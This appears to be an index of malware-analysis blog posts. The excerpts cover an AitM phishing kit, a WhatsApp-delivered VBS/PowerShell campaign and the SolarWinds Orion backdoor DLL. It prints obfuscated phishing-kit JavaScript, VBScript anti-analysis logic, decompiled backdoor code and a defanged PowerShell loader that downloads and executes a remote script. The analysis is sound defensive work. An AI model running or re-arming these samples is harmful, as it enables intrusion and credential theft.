
phishing-kit

February 20, 2026 / Malware and Behavior Analysis

AITM kit sample (inert / displayed as code)

Page text: Verify your account / No account? Create one! / Sign in with a security key / Next / Sign-in options / a@b.com / Forgot password? / Other ways to sign in / Sign in

window.addEventListener('load', function() {
    const configRef = window[Object.keys(window).find(k => k.startsWith('jsConfig_'))];
    const { vars: _funcs14, functions: fnMap, props: hbProps } = configRef;
    const hbCache = […]


phishing-module

February 20, 2026 / Malware and Behavior Analysis

window.addEventListener('load', function() {
    const configRef = window[Object.keys(window).find(k => k.startsWith('jsConfig_'))];
    const { vars: _funcs14, functions: fnMap, props: hbProps } = configRef;
    const hbCache = window[_funcs14.phpConfig];
    const errMsgs = window[_funcs14.errorMessages];
    const stateb44f = window[_funcs14.validationState];
    const options1ed0 = window[_funcs14.initialOptions];
    let viewRef = window[_funcs14.view];
    let email0132 = window[_funcs14.enmail];
    const accessData747b = window[_funcs14.statusAccessData];
    const hbIds = JSON.parse(atob(window[_funcs14.damang]));
    const _classes81 = JSON.parse(atob(window[_funcs14.suke]));f const […]


WhatsApp_VBS_PowerShell

October 13, 2025 / Malware and Behavior Analysis

Appendix B — PowerShell Snippets (Defanged)

Observed Malicious Loader Command (Do NOT Execute)
—————————————————————-
powershell.exe -ep bypass "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;iex ((New-Object Net.WebClient).DownloadString('https://miportuarios[.]com/sisti/api.ps1'))"

IMAP Bootstrap (Mailbox as Config Channel)
—————————————————————-
# Opens TLS IMAP to imap.terra.com.br:993, logs in, searches subject "data", fetches latest body.
# Shown here for analysis context only; do NOT run in production.
# (The […]


WhatApp_PowerShell_VBS-S2

October 13, 2025 / Malware and Behavior Analysis

Overview
– Second-stage VBScript is executed in-memory via ExecuteGlobal by a Stage‑0 loader.
– Primary goals: Portuguese locale gating, anti-analysis checks, configuration bootstrap (IMAP → multi-domain /data.php → Pastebin), PowerShell stage launch, optional self-delete.

Locale Targeting (PT-BR/PT-PT)
—————————————————————-
Function CheckSystemLanguage()
    ' OSLanguage 1046 = pt-BR, 2070 = pt-PT
    ' Registry fallback: HKCU\Control Panel\International\sLanguage starts with […]


Solarwinds DLL Quick Overview

January 10, 2021 / Malware and Behavior Analysis

Hash and certificate stamp:

Filename:          solarwinds.orion.core.businesslayer.dll
MD5:               846E27A652A5E1BFBD0DDD38A16DC865
SHA1:              D130BD75645C2433F88AC03E73395FBA172EF676
SHA256:            CE77D116A074DAB7A22A0FD4F2C1AB475F16EEC42E1DED3C0B0AA8211FE858D6
imphash:           DAE02F32A21E03CE65412F6E56942DAA
description:       SolarWinds.Orion.Core.BusinessLayer
file-type:         dynamic-link-library
certificate-stamp: 0xB9480000 (Tue Jan 21 01:00:00 2020)

Code Analysis:

Part One:

// SolarWinds.Orion.Core.BusinessLayer.OrionImprovementBusinessLayer
// Token: 0x06000057 RID: 87 RVA: 0x00004F8C File Offset: 0x0000318C
private static void DelayMs(double minMs, double maxMs)
{
    if ((int)maxMs == 0)
    {
        minMs = 1000.0;
        maxMs = 2000.0;
    }
    double num;
    for (num = minMs + new Random().NextDouble() * (maxMs - minMs); num >= 2147483647.0; num -= 2147483647.0)
    {
        Thread.Sleep(int.MaxValue);
    }
    Thread.Sleep((int)num);
}

NOTE: sleeps for 24 days

Part Two:

// SolarWinds.Orion.Core.BusinessLayer.OrionImprovementBusinessLayer
// Token: 0x06000055 RID: 85 RVA: 0x00004E14 File Offset: 0x00003014
private static bool GetOrCreateUserID(out byte[] hash64)
{
    string text = OrionImprovementBusinessLayer.ReadDeviceInfo();
    hash64 = new byte[8];
    Array.Clear(hash64, 0, hash64.Length);
    if (text == null) […]
